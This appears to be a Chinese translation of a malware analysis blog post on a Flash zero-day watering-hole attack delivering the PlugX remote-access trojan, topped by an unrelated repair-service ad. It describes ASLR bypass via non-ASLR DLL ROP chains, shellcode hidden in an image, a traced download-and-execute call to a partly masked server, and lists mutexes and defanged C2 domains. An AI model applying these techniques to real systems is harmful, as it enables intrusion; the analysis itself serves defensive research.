沈阳电脑维修上门服务13889116605: 前些天FireEye发布了一个利用AdobeFlash的新0day进行攻击的报告,且Adobe已经根据漏洞情况发布了一个安全更新。根据FireEye的报告,许多网站会将访问者重定向到以下包含e...
前些天FireEye发布了一个利用AdobeFlash的新0day进行攻击的报告,且Adobe已经根据漏洞情况发布了一个安全更新。
根据FireEye的报告,许多网站会将访问者重定向到以下包含exploit的恶意服务器:
PetersonInstituteforInternationalEconomics
AmericanResearchCenterinEgypt
SmithRichardsonFoundation恶意Flash文件位于http://4.59.XXX.XX/common/cc.swf
该Flash包含一些有趣的debugsymbols:
C:\Users07\Desktop\FlashExp(ie)\src\cc.asFlash文件中的ActionScript代码用来确定操作系统版本以及选择硬编码的ROPchains来绕过ASLR。
如果是WindowsXP系统,代码会先检查系统语言,对于以下两种语言的系统,则只包含ROPchains:
英文
中文在这种情况下(WindowsXP系统),ROPchain使用一种众所周知的技术从msvcrt.dll中提取编译。
如果系统运行的是Windows7:
-检查系统是否安装了Java1.6或Java1.7。
-如果安装了Java1.6,代码使用Java1.6中自带的msvcr71.dll中的ROPchain,该dll文件没有ASLR保护。
-检查系统是否安装了MicrosoftOffice2007或2010
-如果安装了,则使用MicrosoftOffice2007/2010中自带的hxdl.dll中的ROPchain,该dll没有ASLR保护。
要加载hxds.dll,需要使用一种在这种类型的exploits中很常见的协议处理器location.href="/onload="resizeimg(this,575,600)">
下载的文件如下图所示,看起来是个正常的图片:
但该图片在位于偏移3344的地方包含一个shellcode,该shellcode会从同一服务器下载并执行一个PE32文件:
利用图片执行shellcode是一个聪明的做法,因为这样可以绕过很多网络安全产品的监控。
该shellcode通过利用以下函数来下载并执行PE32文件:
LoadLibraryA(wininet)
LoadLibraryA(user32)
VirtualProtect(adr=404bf1,sz=4,flags=40)
SetUnhandledExceptionFilter(0)
VirtualProtect(adr=7c81cdda,sz=82,flags=40)
VirtualProtect(adr=7c81cdda,sz=82,flags=0)
SetUnhandledExceptionFilter(7c81cdda)
GetTempPath(len=104,buf=12fca4)=14
GetTempFileName(path=C:\users\jaime\Temp\,prefix=0,unique=0,buf=12fca4)=245D
Path=C:\users\jaime\Temp\245d.tmp
InternetOpenA()
InternetOpenUrlA(http://4.59.XX.XX/common/update.exe)
CreateFileA(C:\users\jaime\Temp\245d.tmp)=4
InternetReadFile(1,buf:12fbe8,size:64)
InternetCloseHandle(1)=1
InternetCloseHandle(1)=1
CloseHandle(4)本次攻击中所用的payload是一个不怎么出名的远控程序PlugXRAT,我之前的博客中提到过它几次:
TrackingdowntheauthorofthePlugXRAT
TheconnectionbetweenthePlugxChinesegangandthelatestInternetExplorerZeroday
NewversionsoftheIExplorerZeroDayemergetargetingDefenceandIndustrialcompanies
恶意程序会将它自己拷贝到\AllUsers\DRM\RasTls\RasTls.exe,并在执行过程中创建以下互斥文件:
\BaseNamedObjects\Global\dklw
\BaseNamedObjects\Global\cso
\BaseNamedObjects\Global\qemyqvmyhiy
\BaseNamedObjects\Global\eriwjjo
\BaseNamedObjects\Global\etniisebehheq
\BaseNamedObjects\Global\beetxado
\BaseNamedObjects\Global\zhyzrjduosfptunf
\BaseNamedObjects\Global\zzusnnzeqgzupeto
\BaseNamedObjects\Global\onwmkwazrynpn
\BaseNamedObjects\Global\nmtg
\BaseNamedObjects\Global\helbibkzhruo
\BaseNamedObjects\Global\opylrvflplgad
\BaseNamedObjects\Global\zgjawrojchcfavnh
\BaseNamedObjects\Global\gmd
\BaseNamedObjects\Global\svdwr
\BaseNamedObjects\Global\unbdehrrxgqujyazj
\BaseNamedObjects\Global\qpl
\BaseNamedObjects\Global\ihnwguwceofkhcv
\BaseNamedObjects\Global\kvxieoc
\BaseNamedObjects\My_Name_horse(Svchost)同时将自身注入到svchost进程中。
PlugX包含三种不同的命令和控制方式:
00903474->java[.]ns1[.]name
009034B8->adservice[.[no-ip[.]org
009034FC->wmi[.]ns01[.]us并通过HTTP与C&C交互:
注意下图中指定的C&C域名是恶意构造的:
至此,不用我提醒你也会尽快更新Adobe和包含漏洞、可以被用来绕过ASLR的Java和Office版本了吧。
祝玩得愉快!
上一篇:
浅议SNMP安全、SNMP协议、网络管理学习
